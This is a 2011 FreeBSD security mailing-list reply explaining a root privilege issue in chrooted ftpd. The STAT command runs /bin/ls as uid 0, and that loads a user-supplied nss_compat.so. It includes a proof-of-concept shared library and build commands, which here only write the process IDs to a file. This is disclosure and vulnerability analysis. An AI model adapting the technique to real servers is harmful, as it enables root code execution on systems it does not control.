From owner-freebsd-security@FreeBSD.ORG  Wed Nov 30 21:09:17 2011
Return-Path: <owner-freebsd-security@FreeBSD.ORG>
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34])
	by hub.freebsd.org (Postfix) with ESMTP id DE3B8106566B
	for <freebsd-security@freebsd.org>;
	Wed, 30 Nov 2011 21:09:17 +0000 (UTC)
	(envelope-from przemyslaw@frasunek.com)
Received: from lagoon.freebsd.lublin.pl (lagoon.freebsd.lublin.pl
	[IPv6:2a02:2928:a::3])
	by mx1.freebsd.org (Postfix) with ESMTP id 6898B8FC16
	for <freebsd-security@freebsd.org>;
	Wed, 30 Nov 2011 21:09:17 +0000 (UTC)
Received: from [IPv6:2a02:2928:a:ffff:85e8:10d:f67d:c7ee] (unknown
	[IPv6:2a02:2928:a:ffff:85e8:10d:f67d:c7ee])
	by lagoon.freebsd.lublin.pl (Postfix) with ESMTPSA id BFAB5239453;
	Wed, 30 Nov 2011 22:09:15 +0100 (CET)
Message-ID: <4ED69B7E.50505@frasunek.com>
Date: Wed, 30 Nov 2011 22:09:18 +0100
From: Przemyslaw Frasunek <przemyslaw@frasunek.com>
Organization: frasunek.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64;
	rv:8.0) Gecko/20111105 Thunderbird/8.0
MIME-Version: 1.0
To: Mike Tancsa <mike@sentex.net>
References: <4ED68B4D.4020004@sentex.net>
In-Reply-To: <4ED68B4D.4020004@sentex.net>
X-Enigmail-Version: 1.3.3
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Cc: "freebsd-security@freebsd.org" <freebsd-security@freebsd.org>
Subject: Re: ftpd security issue ?
X-BeenThere: freebsd-security@freebsd.org
X-Mailman-Version: 2.1.5
Precedence: list
List-Id: "Security issues \[members-only posting\]"
	<freebsd-security.freebsd.org>
List-Unsubscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-security>, 
	<mailto:freebsd-security-request@freebsd.org?subject=unsubscribe>
List-Archive: <http://lists.freebsd.org/pipermail/freebsd-security>
List-Post: <mailto:freebsd-security@freebsd.org>
List-Help: <mailto:freebsd-security-request@freebsd.org?subject=help>
List-Subscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-security>, 
	<mailto:freebsd-security-request@freebsd.org?subject=subscribe>
X-List-Received-Date: Wed, 30 Nov 2011 21:09:17 -0000

> Saw this on FD... Anyone know any more details about this ?
> http://lists.grok.org.uk/pipermail/full-disclosure/2011-November/084372.html

This is a well known hazard of chrooting to directories controlled by
unprivileged users. In this case, vulnerability exists because ftpd calls
/bin/ls with uid=0 and euid!=0 when STAT command is issued, and nss_compat.so is
loaded by libc regardless of elevated privileges.

This can be proven by creating dummy ~/lib/nss_compat.so.1:

[venglin@lagoon ~/lib]$ cat dummy.c
#include <stdio.h>
#include <fcntl.h>

void _init() {
        FILE *fp = fopen("asdf", "w+");
        fprintf(fp, "%d %d\n", getuid(), geteuid());
}
[venglin@lagoon ~/lib]$ cc -o dummy.o -c dummy.c -fPIC
  [venglin@lagoon ~/lib]$ cc -shared -Wl,-soname,dummy.so -o dummy.so dummy.o
-nostartfiles
[venglin@lagoon ~/lib]$ mv dummy.so nss_compat.so.1

And after calling STAT command:

[venglin@lagoon ~/lib]$ cat ~/asdf
0 3000

BTW. This vulnerability affects only configurations, where /etc/ftpchroot exists
or anonymous user is allowed to create files inside etc and lib dirs.

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com ** NICHDL: PMF9-RIPE *
* Jabber ID: venglin@nette.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ5JIV *